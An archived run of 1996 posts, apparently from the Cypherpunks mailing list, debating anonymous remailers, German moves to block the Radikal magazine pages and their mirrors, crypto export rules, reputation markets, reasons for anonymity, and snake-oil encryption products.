(Anonymous) Date: Thu, 5 Sep 1996 16:10:03 +0800 Subject: WinSock Remailer Available Overseas Message-ID: <199609050553.HAA12430@basement.replay.com> The Winsock remailer announced by Joey Grasty available at Obscura, an access-contolled site on August 21, became available August 26 at at least five overseas sites, one of which is ftp://ftp.replay.com/pub/replay/pub/remailer/wsa12.zip OK, let's get some more non-USA remailers running!! From jimbell at pacifier.com Thu Sep 5 01:14:41 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 5 Sep 1996 16:14:41 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609050305.UAA08601@mail.pacifier.com> At 05:13 PM 9/4/96 -0700, Declan McCullagh wrote: >On Wed, 4 Sep 1996, jim bell wrote: >> Why WOULDN'T the police want to shut down anonymous remailers? The Leahy >> bill clearly didn't distinguish between remailer operators and users, so it >> is no leap to conclude that they would be treated similarly. > >Why *wouldn't* the police want to shut 'em down? Because the police >respect the Constitution and our civil liberties, of course, and realize >and respect the value of anonymous political speech. "Hey, man, whatever you'se been smoking, could'ja give me a joint or two?" Jim Bell jimbell at pacifier.com From declan at well.com Thu Sep 5 01:26:43 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 5 Sep 1996 16:26:43 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists Message-ID: [Note www.anonymizer.com doesn't seem to be blocked. --Declan] --- Date: Thu, 5 Sep 1996 01:59:36 +0200 (MET DST) From: Ulf Moeller To: fight-censorship at vorlon.mit.edu Subject: German Internet Censorhip: http://www.xs4all.nl The German Generalbundesanwaltschaft (Chief Federal Prosecutor's office) has "advised" the Internet providers to block access to http://www.xs4all.nl:80 and http://www.serve.com:80 due to supposedly illegal contents at the URLs http://www.serve.com/spg/154/, http://www.xs4all.nl/~tank/radikal//154/ and http://ourworld.compuserve.com/homepages/angela1/radilink.htm. The commercial ISPs have blocked the routes to the servers. Their statement (in German) is at http://www.anwalt.de/ictf/p960901d.htm "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication from the radical left that is illegal in Germany, but not in the Netherlands. --- Date: Wed, 4 Sep 1996 22:15:42 -0700 (PDT) From: Declan McCullagh To: fight-censorship at vorlon.mit.edu Subject: Re: German Internet Censorhip: http://www.xs4all.nl I heard about this a few days ago, but I was unable to verify it. Yesterday I bounced mail through a German university to xs4all.nl back to EFF, and it came through just fine. I also tried golden-gate.owl.de and wserver.physnet.uni-hamburg.de, both of which have no problems talking to xs4all.nl. From those tests, I can say there's no complete ban, though I can't confirm or deny any partial ban. However, just in case the German government is successful in this censorship gambit, I've mirrored the three embattled web sites at: http://www.well.com/~declan/mirrors/ This is a quick grab of the files in question; I'll work on a formatted intro page later. (As background for more recent subscribers to fight-censorship, this isn't the first time the German government has tried this. A similar move came early this year when German prosecutors tried to cut connections to webcom.com in California, where some of Ernst Zundel's Nazi "Holocaust Revisionist" propaganda was hosted. I and a few other folks including Rich at Stanford and Blake at Penn held our noses and mirrored it around the country, prompting the Gemans to lift the ban. I had thought the German prosecutors smarter than to try this again. I guess I was wrong.) My global Net-censorship roundup is at: http://www.eff.org/~declan/global/ -Declan From stewarts at ix.netcom.com Thu Sep 5 01:32:47 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 5 Sep 1996 16:32:47 +0800 Subject: rc2 export limits.. Message-ID: <199609050609.XAA17556@dfw-ix8.ix.netcom.com> I'm afraid my source is "Read it on the net and was surprised to hear it". My assumption is that the limit is for software that implements both signature and verification, since ITAR doesn't ban export of pure-authentication software. Is the State Dept doc on the net? It would be nice to have something saying there are well-defined rules that they agree to follow, unreasonable and unconstitutional though they may be. At 12:06 PM 9/4/96 -0400, Kent Briggs <72124.3234 at compuserve.com> wrote: >stewarts at ix.netcom.com wrote: >> However, the usual guidelines for systems like RC2 and RC4 is >> 40-bit keys, and RSA keys up to 512 bits for encrypting >> session keys and 1024 bits for signatures > >Can you list a source for the 1024-bit signature restriction? I know >about the 40-bit RC2/RC4 and 512-bit public encryption keys because they >are specifically addressed in the State Dept's "Procedure for Submitting >a Commodity Jurisdiction Request for a Mass Market Software Product that >Contains Encryption". However, digital signatures are not mentioned in >this procedure. I can't image what justificication could be used to >restrict the strength of digital signatures. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From mccoy at communities.com Thu Sep 5 01:40:38 1996 From: mccoy at communities.com (Jim McCoy) Date: Thu, 5 Sep 1996 16:40:38 +0800 Subject: Reputations Message-ID: Greg Burk writes: > Too little incentive to shoot for the heights: > > Suppose you judge that you've accumulated twice as much "reputation > capital" as Joe. How do you get twice as much payoff? It seems to me > that above the threshhold of credibility, minor side issues make more > difference than your two-fold "reputation capital" differential. Go read Ender's Game by Orson Scott Card (a good book to read anyway :) and examine the nature of the computer network "discussion groups" he talks about: a classic example of reputation markets in many-to-many discussions. With the proper tools someone with twice the reputation capital in a particular category as another will have a greater chance of what they say not being filtered out as noise. > As an "asset", it is extremely non-liquid: > > How exactly would you "convert" your reputation into other capital? > Would you accept bribes and tell lies? Seems to me you would only get a > one-shot "conversion" and it couldn't possibly hope to equal your > investment. Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have converted reputation capital into large piles of money. Time is an asset that has a monetary value to most people, and they are willing to spend money to hear the opinions of sources which they feel have a high reputation in a particular area rather than spending the time necessary to do the research and investigation themselves. > So I think the latter part of the analysis is wishful thinking, or at > least restricted to a small subset of subject-matter. No, I think that you just don't understand the mechanics of reputations and how they interact with the most important resource in most people's lives: time. Instead of thinking of "reputation" look at it from the other end and consider the "attention marketplace." Right now reputation markets have a limited presence on the internet (mostly through killfiles) because the tools required are not integreated into the tools used to browse the information. In time this will change. jim From Adamsc at io-online.com Thu Sep 5 01:44:28 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 5 Sep 1996 16:44:28 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail Message-ID: <19960905062418656.AAA164@IO-ONLINE.COM> On Wed, 4 Sep 1996 23:31:29 -0400 (EDT), The Deviant wrote: >> He said the man was detected by two couples who noticed him moving his >> foot under the skirt of a woman. They followed the man, held him and >> called police. >> Police ask women who feel they've been victimized to call 808-5289. >> George Walter Campbell, 62, of Cornwall, has been charged with sexual >> assault and mischief. He returns to College Park court on Sept. 10. >> He was released on $750 cash bail yesterday. >Hrmm.. I can see how its _wrong_, but exactly how is looking under >somebodies skirt _assault_? Mischief is true. However it does get back to the eventual question: if they are giving off radiation, are we guilty receiving them? For instance, if you have your pot sensing IR camera in a plane, do you need a search warrant? If you walk around with a scanner listening to cell-phones is it illegal? One can also imagine a sewer worker getting sued for looking out of one of those cover grill things. (Perhaps up at a cover girl. Pun intended.) - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From nobody at zifi.genetics.utah.edu Thu Sep 5 01:56:13 1996 From: nobody at zifi.genetics.utah.edu (Anonymous) Date: Thu, 5 Sep 1996 16:56:13 +0800 Subject: Race Bit: C Message-ID: <199609050630.AAA07395@zifi.genetics.utah.edu> >At 02:47 AM 9/4/96 -0700, Timothy C. May wrote: >>At 3:02 AM 9/4/96, James A. Donald wrote: >>>At 10:33 PM 9/3/96 -0800, jim bell wrote: <...> [I am unsure just *who* wrote:] >>As the recent discussion of knives, switchblades, and throwing stars >>showed, such ambiguous laws are often used to keep the coloreds down. Gunlaws and druglaws have deep roots in racism, but it is politically incorrect to say, even if I can find it in the congressional record. [and I can.] But then it was certainly Jim Bell who wrote: >Perhaps the most ominous part of making "use of encryption to thwart an >investigation" illegal is _not_ that remailer operators might be prosecuted, >but that they might NOT be prosecuted in a deal where (in exchange for not >being prosecuted) they continue to operate the remailer, "cracked" or >sabotaged so that they share all the info with the cops. While even that >won't make chained remailers totally useless, eventually suspicions of such >a crack will surface, which will help sabotage the credibility of all >remailers, not just the ones that have been "stung." If someone tried a scheme involving violence such as A. P. through a remailer I was involved in, the feds would not have to threaten me with prosecution to get me to cooperate with them. I may not keep any logs right now, Jim, but if your little scheme gets underway I will cooperate willingly as long as I don't compromise the privacy of non- violent people such as drug users & sellers. For them, I would go to jail; for you, I would even cooperate with the BATF (which should be defunded 100%, IMO). Violence begats violence which begats even larger government, don't start us on that road -- leave me in peace. From isptv at access.digex.net Thu Sep 5 02:17:49 1996 From: isptv at access.digex.net (ISP-TV Main Contact) Date: Thu, 5 Sep 1996 17:17:49 +0800 Subject: No Subject Message-ID: <199609050626.CAA28796@access2.digex.net> *** ISP-TV Program Announcement: Meeks Interview *** Monday, September 9 9:00 PM ET Brock Meeks Chief Washington Correspondent for WIRED and HotWIRED WIRED's chief muckraking journalist will join ISP-TV for a discussion of the the technology policy underbelly of Washington, D.C, ranging from the Communications Decency Act to pornography in the bathrooms of the Senate Russell Building. This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html There will be a call-in number for questions, and we will be monitoring EFnet IRC channel #isptv See URL http://www.digex.net/isptv for more information about the ISP-TV Network From jamesd at echeque.com Thu Sep 5 02:21:19 1996 From: jamesd at echeque.com (James A. Donald) Date: Thu, 5 Sep 1996 17:21:19 +0800 Subject: FWD: Another try to kill democracy Message-ID: <199609050642.XAA28858@dns2.noc.best.net> At 09:53 PM 9/2/96 +0000, SPG wrote: > I just got wind that the German government is planning to force german > ISP's to shut off access to my ISP, XS4ALL, because the german magazine >'Radikal' has a web page on xs4all. A few more details please: What german agency is taking what action. Has any access been shut off yet, or is it just some two bit asshole fascist with delusions of grandeur? > Please considder mirroring or linking to this site. Linking is pointless if the site is cut off or access seriously threatened. Mirroring is appropriate only if access is seriously threatened. How serious is this threat? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From tcmay at got.net Thu Sep 5 03:01:37 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 18:01:37 +0800 Subject: Reasons for Preferring Anonymity Message-ID: At 3:41 AM 9/4/96, Jon Lebkowsky wrote: >The terms "responsibility" and "accountability" are misused, which is >unfortunate, since I think we'd all argue in favor of taking responsibility >for our speech/actions in a positive sense. The negative is in asking me to This issue keeps coming up: "Shouldn't people be willing to take responsibility for their speech and actions?" No, actually, and I presented the fact that people are using anonymity and remailers as evidence that clearly they are not willing to take responsibility under their own, traceable True Names for their speech. Q.E.D. But the issue persist. Well, why do people use anonymity in general? * To call the IRS to ask questions. Maybe to ask what they should do if they haven't paid taxes since 1983. Believe me, with the advent of "Caller ID" here in California, I've learned to use payphones before calling the IRS office over in San Jose. (As the Net takes on a larger role, what will be the parallel to anonymous calls to the IRS? Obvious answer.) * AIDS test results. And a whole panoply of similar queries. Caller anonymity is crucial. * Whistleblowing, obviously. * Ordering of information and supplies is often done through agents, or cut-outs. Coca Cola, as the story goes, orders supplies so as to deliberately confuse those trying to deduce the formula for Coke (probably a bad example, as the 80-90 years of Coke has probably made the formula for Coke a kind of joke). But there are very real cases where businesses make queries or orders and cannot tolerate traceability to them. (Dyson's thought that maybe anonymity should be banned for businesses shows her lack of understanding of the issues.) * As a special form of whistleblowing, sometimes people have information they feel should be disseminated, and have no desire to be "accountable" for releasing this information. The release of RC4 code is an example. The Dumpster diving of Mykotronx is another. * Admissions and confessions. Those who use the various "recovery" groups obviously feel no need to ensure "accountability" and "traceability," nor should they. * Their comments may affect their Real World jobs, their status in organizations, their distant future political careers, etc. (In an age of Web spiders, anything said may show up in future lawsuits, divorce settlements, tenure reviews, political campaigns, etc.) And so on. John L. may wish that all people believe in being held accountable for their speech and actions, but obviously this demonstrably is not the case. Names are just another credential, another potential factor in a transaction. Sometimes they help to close a deal, sometimes they are unneeded. The notion that a government-issued name credential is necessary for mutually-satisfactory transactions is just an illusion. --Tim May (have any of you checked that I am really, truly who I claim to be? Have you been dealing with me on the basis of belief that I am a persistent personna, or because you saw me present an SS card?) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From madden+ at andrew.cmu.edu Thu Sep 5 04:32:51 1996 From: madden+ at andrew.cmu.edu (Rebecca L Madden) Date: Thu, 5 Sep 1996 19:32:51 +0800 Subject: up In-Reply-To: Message-ID: it's three o four. I'm up. Becky Madden #(412)-862-2934 //<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\ I believe that imagination is stronger than knowledge- That myth is more potent than history. I believe that dreams are more powerful than facts- That hope always triumphs over experience- That laughter is the only cure for grief. And I believe that love is stronger than death. -Robert Fulghum From gary at systemics.com Thu Sep 5 05:02:45 1996 From: gary at systemics.com (Gary Howland) Date: Thu, 5 Sep 1996 20:02:45 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: Message-ID: <322E94B9.41C67EA6@systemics.com> Declan McCullagh wrote: > > The German Generalbundesanwaltschaft (Chief Federal Prosecutor's > office) has "advised" the Internet providers to block access to > http://www.xs4all.nl:80 and http://www.serve.com:80 due to > supposedly illegal contents at the URLs http://www.serve.com/spg/154/, > http://www.xs4all.nl/~tank/radikal//154/ and > http://ourworld.compuserve.com/homepages/angela1/radilink.htm. > > The commercial ISPs have blocked the routes to the servers. > Their statement (in German) is at http://www.anwalt.de/ictf/p960901d.htm I wonder how they are doing this? We know that the Germans allow full internet access (don't they?), so they can't be using a filtering http proxy. I guess they're blocking on IP number (and perhaps port). It might be a good idea for xs4all to gather up all of their spare IP numbers, and alias the lot on their web site - this would increase the number of blocked addresses needed. It might also be a good idea to run some proxies on unusual ports (eg. smtp, DNS, pop, ftp ports) (although of course this will then need to be a dedicated proxy machine) - again this would increase the size of the blacklist that the Germans must use, and may involve some awkward router programming (for example, a router might be configured to allow all DNS traffic - if a proxy is sitting on the DNS port, then things get a bit difficult to set up). Of course, netscape probably won't allow use of these ports (it certainly doesn't allow the use of port 79). Gary -- pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From moe-san at stadt.com Thu Sep 5 06:44:31 1996 From: moe-san at stadt.com (D. Moeller) Date: Thu, 5 Sep 1996 21:44:31 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: <199609050642.XAA28858@dns2.noc.best.net> Message-ID: <322EA63D.35B5@stadt.com> James A. Donald wrote: > > At 09:53 PM 9/2/96 +0000, SPG wrote: > > I just got wind that the German government is planning to force german > > ISP's to shut off access to my ISP, XS4ALL, because the german magazine > >'Radikal' has a web page on xs4all. <..> > How serious is this threat? No problem in gaining access so far. I even traces through Telekom and C-Serve - no trace of restrictions. Maybe just a way to generate traffic to a lame site? Cheers Moe! -- D. Moeller at WebLab U-Agency GmbH webadmin at stadt.com http://www.stadt.com/u-agency/ moe-san at elcafe.com http://www.elcafe.com/~moe-san/ From tank at xs4all.nl Thu Sep 5 07:38:38 1996 From: tank at xs4all.nl (SPG) Date: Thu, 5 Sep 1996 22:38:38 +0800 Subject: FWD: Another try to kill democracy Message-ID: <322ECF33.6871CB6D@xs4all.nl> James A. Donald wrote: > > A few more details please: What german agency is taking what action. Oke, taken from: http://www.anwalt.de/ictf/p960901e.htm ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Internet Content Task Force (ICTF), Press Release of Sep. 03, 1996 RA Michael Schneider, eco e.V. A telefax was received by us from the Public Prosecutor General on August 30 in which eco e.V. is informed of an on-going investigatory procedure. We have been requested in this context to inform all Internet service providers affiliated with ICTF (Internet Content Task Force) the following in writing: "Under the following addresses in Internet: http://www.serve.com/spg/154/ http://www.xs4all.nl/~tank/radikal//154/ and using the link on page http://ourworld.compuserve.com/homepages/angela1/radilink.htm one can call up the entire edition of the pamphlet entitled �radikal Nr. 154". Parts of this pamphlet justify preliminary suspicion of promoting a terrorist organization under � 129a, Par.3 of the German Criminal Code, public condoning of criminal activities penalizable under � 140 no.2 of the German Criminal Code and preliminary suspicion of inciting to criminal activity under � 130a Par.1 of the German Criminal Code. The Public Prosecutor General at the Federal Court of Justice has therefore initiated a criminal investigatory procedure against the parties disseminating this pamphlet. You are herewith informed that you may possibly make yourself subject to criminal prosecution for aiding and abetting criminal activities if you continue to allow these pages to be called up via your access points and network crosspoints" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > > Please considder mirroring or linking to this site. As of today: http://burn.ucsd.edu/%7Eats/RADIKAL/ http://www.jca.or.jp/~taratta/mirror/radikal/ http://www.serve.com/~spg/ http://huizen.dds.nl/~radikal http://www.canucksoup.net/radikal/index.html http://www.ecn.org/radikal http://www.well.com/~declan/mirrors/ http://www.connix.com/~harry/radikal/index.htm http://www.connix.com/~harry > Linking is pointless if the site is cut off or access seriously threatened. > > Mirroring is appropriate only if access is seriously threatened. > > How serious is this threat? Serious enough i think. henk (SPG) From asgaard at Cor.sos.sll.se Thu Sep 5 08:25:02 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 5 Sep 1996 23:25:02 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: On Wed, 4 Sep 1996, Declan McCullagh wrote: > The German Generalbundesanwaltschaft (Chief Federal Prosecutor's > office) has "advised" the Internet providers to block access to > "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication > from the radical left that is illegal in Germany, but not in > the Netherlands. This is amazing. Without defending the German stand on the Revisionist crap, that part is at least understandable in a historical context (their sense of guilt for the unfortunate developments in the 30's and 40's etc). But a quick overview of the contents of Radikal gives the impression of an ordinary leftist zine, defining the outlawing of it as pure political censorship in a Western 'democracy'. I'm truly surprised. Asgaard From peter.allan at aeat.co.uk Thu Sep 5 09:31:37 1996 From: peter.allan at aeat.co.uk (Peter M Allan) Date: Fri, 6 Sep 1996 00:31:37 +0800 Subject: Job for netescrow ? (was Secure anonymouse server protocol... Message-ID: <9609051155.AA14504@clare.risley.aeat.co.uk> In the talk about replyable nym-mailers I haven't yet seen netescrow mentioned. You DID all read this ? > Oblivious Key Escrow > Matt Blaze AT&T Research > mab at research.att.com > 12 June 1996 > > Abstract > We propose a simple scheme, based on secret-sharing over large-scale > networks, for assuring recoverability of sensitive archived data e.g., > cryptographic keys. In our model any one can request a copy of the > archived data but it is very difficult to keep the existence of a > request secret or to subvert the access policy of the data owner. This all hinges on a policy to be followed by archive holders defining the conditions under which they release their shares. This could be receipt of a signed request from the owner (remailer). Maybe the table relating nyms to reply addresses could be stored in netescrow style so that captured remailers reveal nothing. The problem of operator coercion is not addressed by this. Police investigations might apply "angry mob cryptanalysis" to find a sender - convincing a sizable number of operators that a crime had been committed with some particular piece of traffic. Anybody want to estimate traffic + storage requirements ? Or number of participants needed for a viable scheme ? -- Peter Allan peter.allan at aeat.co.uk From richards at netrex.com Thu Sep 5 10:26:36 1996 From: richards at netrex.com (Richard Stiennon) Date: Fri, 6 Sep 1996 01:26:36 +0800 Subject: 2^1,257,787-1 Message-ID: <2.2.32.19960905122436.00b04674@trex.netrex.com> At 09:54 AM 9/4/96 -0700, John F. Fricker wrote: >Ok so maybe here in Organ we are a little behind the times but I just heard >about this 378,632 digit prime. Grab your HP11C's and crank out >2^1,257,787-1 courtesy of David Slowinski at Cray. Is there a URL for the entire number? Or could someone post it to the list? ---------------------------------------------------------------------------- Richard Stiennon richards at netrex.com Director, Business Development http://www.netrex.com Netrex, Inc. Voice: 810-352-9643 Southfield, Michigan Fax: 810-352-2375 ----------------------------------------------------------------------------- Providing businesses and organizations with secure Internet solutions. From ponder at freenet.tlh.fl.us Thu Sep 5 11:11:32 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Fri, 6 Sep 1996 02:11:32 +0800 Subject: rc2 export limits.. Message-ID: keywords: ITAR, SHA, beneficial and innocuous crypto The persistent reputation known as Bill Stewart wrote: >Date: Wed, 04 Sep 1996 23:09:17 -0700 >From: Bill Stewart >To: Kent Briggs <72124.3234 at compuserve.com> >Cc: cypherpunks at toad.com >Subject: Re: rc2 export limits.. > >I'm afraid my source is "Read it on the net and was surprised to hear it". >My assumption is that the limit is for software that implements >both signature and verification, since ITAR doesn't ban export of >pure-authentication software. The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in the fine print at the beginning that SHA is export controlled. I don't have the document to refer to right now, but it plainly states that SHA falls under ITAR. As a cryptographic hash function, why would it be controlled in this way? How can I use SHA to encrypt something for someone else to decrypt? I know how to use it for authentication; am I missing something here? ANFSCD: I tried that OnNet32 e-mail software from FTP software. It runs under Windows95. It is a lot of material to download, and way too intrusive to install. It wants to metastasize itself into the innards of Microsoft Exchange and Inboxes, etc. What is it with all this complexity anyway? Why not just have a POP client that will check mail on the server? It also wants you to store your mailbox password in it, as opposed to letting you enter it on a session-by-session basis. I don't like that. sticking with PINE, PGP, and Xywrite II for now.... From bkmarsh at feist.com Thu Sep 5 11:18:30 1996 From: bkmarsh at feist.com (Bruce M.) Date: Fri, 6 Sep 1996 02:18:30 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail In-Reply-To: Message-ID: On Wed, 4 Sep 1996, Declan McCullagh wrote: > > Hrmm.. I can see how its _wrong_, but exactly how is looking under > > somebodies skirt _assault_? > > Why is this wrong? Information wants to be free! > > More to the point, boys used to put mirrors on their shoes. Now they > learn about shoecams on the Net. I'm working on some nanotech bots to take care of everything now. With a little more work I'm sure they'll be able to actually later reproduce the 'target' in life-like synthetics. Uhh.. any investors interested? :) ________________________________ [ Bruce M. - Feist Systems, Inc. ] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ "Official estimates show that more than 120 countries have or are developing [information warfare] capabilities." -GAO/AIMD-96-84 So, what is your excuse now? From campbell at c2.net Thu Sep 5 11:21:04 1996 From: campbell at c2.net (Rick Campbell) Date: Fri, 6 Sep 1996 02:21:04 +0800 Subject: NYT on penet closure Message-ID: <9609051348.AA16186@cfdevx1.lehman.com> -----BEGIN PGP SIGNED MESSAGE----- http://www.nytimes.com/library/cyber/week/0905remail.html September 5, 1996 Scientology Case and Finnish Law Blamed for Demise of Remail Service By PAMELA MENDELS The issue, Johan M. Helsingius insists, was not pornography but privacy. Helsingius, the Finnish volunteer who shook the online community last week with the announcement that he was closing his popular anonymous remailer service, said in an interview on Wednesday that he had acted because he believes that Finland today offers inadequate privacy protection to Internet users. The only thing I am concerned with is that the threshold of protection for the Internet should be the same as for ordinary postal mail or phone calls. Johan M. Helsingius [ I've deleted the rest of the article. See the URL above for the full text. -Rick ] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMi7aJhj0UvMeUesFAQHEHwP+N+MB+YrO1HfxXJx5v+z6PCMcwCREpvYN /HZGzdlvh4z1A0viQluGjkhDe0Xo/gLfiCxzsVM92zWEBhzh5cYiWDO0gj5tJklc nU/WPVOpz7+W/JR495NwcDFKiHUQU/nInq26ixVTPi+56YHG2cTl61iHc7b1Pnt0 jBVa+8V9WTM= =kigF -----END PGP SIGNATURE----- From paul at fatmans.demon.co.uk Thu Sep 5 12:26:00 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 03:26:00 +0800 Subject: SNAKEOIL ALLERT: FUCKHEAD ;-) Message-ID: <841932737.22584.0@fatmans.demon.co.uk> > SK> I am currently not releasing the source code.Here is a copy of the zip > SK> file if you get hold of a pc. Aghhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh. Last week is was " The Knapsack TM " with a "proprietary algorithm" now it`s Secureit for windows! It`s a veritable flood of snakeoil..... lets start a drunroll: fuckhead Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From paul at fatmans.demon.co.uk Thu Sep 5 12:35:47 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 03:35:47 +0800 Subject: Pseudocrypto detector is going wild Message-ID: <841932730.22539.0@fatmans.demon.co.uk> > Is it just me, or is the snake-oil frequency factor scaling up? > We used to get this stuff quarterly, and now it's monthly, if > not weekly! > > slither-squeek Yeah, I too have noticed this. Hey kids, heres uncle Pauls Snake oil test. if the post contains any of the following it is slither-squeek material: 1. The word "Proprietary" 2. References to a new algorithm, which hasn`t been seen yet and is "the strongest ever" 3. people who use TM after their alogorithm, this is Snakeoil(TM)(R) 4. People who think cryptographers seeing their algorithm will make it less secure 5. People who have never coded a crypto tool in their life then instead of working on current algorithm implementations re-invent the wheel because they don`t understand how to implement current ciphers. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From paul at fatmans.demon.co.uk Thu Sep 5 12:53:32 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 03:53:32 +0800 Subject: No Subject Message-ID: <841932742.22613.0@fatmans.demon.co.uk> > > The gubment has no right to fuck with any speech - (seditius) libel, child > > porn, bomb-making instructions... > > > Agreed. Otherwise, by a slipery slope argument, they can eventually > supress any form of speech whatsoever. true enough, most punks on here are a bit less radical but we need more of this sort of absolutism Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From schmidt at pin.de Thu Sep 5 14:15:22 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 05:15:22 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: Message-ID: On Thu, 5 Sep 1996, Declan McCullagh wrote: > > You're not talking about http://www.anwalt.de/ictf/p960901e.htm, are you? > I'm talking about this link (you mentioned earlier). Maybe I can translate it (or I can summarize it). (tomorrow :) -stephan From tcmay at got.net Thu Sep 5 15:11:46 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 6 Sep 1996 06:11:46 +0800 Subject: Herr Schmidt Message-ID: At 3:20 PM 9/5/96, Stephan Schmidt wrote: >Definetly not. >There is an advisory from the Generalbundesanwaltschaft and >the ICTF that ISPs should ('have to') restrict the access to >those urls. > >But so far nothing happend. I asked some people >to try the urls and there where no restrictions. >(I encounterd no restrictions myself.) By the way, I used the name "Schmidt" in my satire post, sent out earlier this morning. I picked that name randomly, being a common German name (cognate to Smith, I believe), and meant nothing with regard to Stephan. (I also don't dislike Germans in general. I studied some German in high school--don't ask me to use it, though!--and have visited Germany. They just have a certain well-known tendency to take the authoritarian path at times.) --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From makof at alias.cyberpass.net Thu Sep 5 15:16:45 1996 From: makof at alias.cyberpass.net (makofi) Date: Fri, 6 Sep 1996 06:16:45 +0800 Subject: Steganography -- Tell-tale signs? Message-ID: <199609051649.JAA06578@sirius.infonex.com> Hi there! I'd appreciate some help from you experts in steganography. 1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they? 2) Would it better to hide the data in a jpg with black and 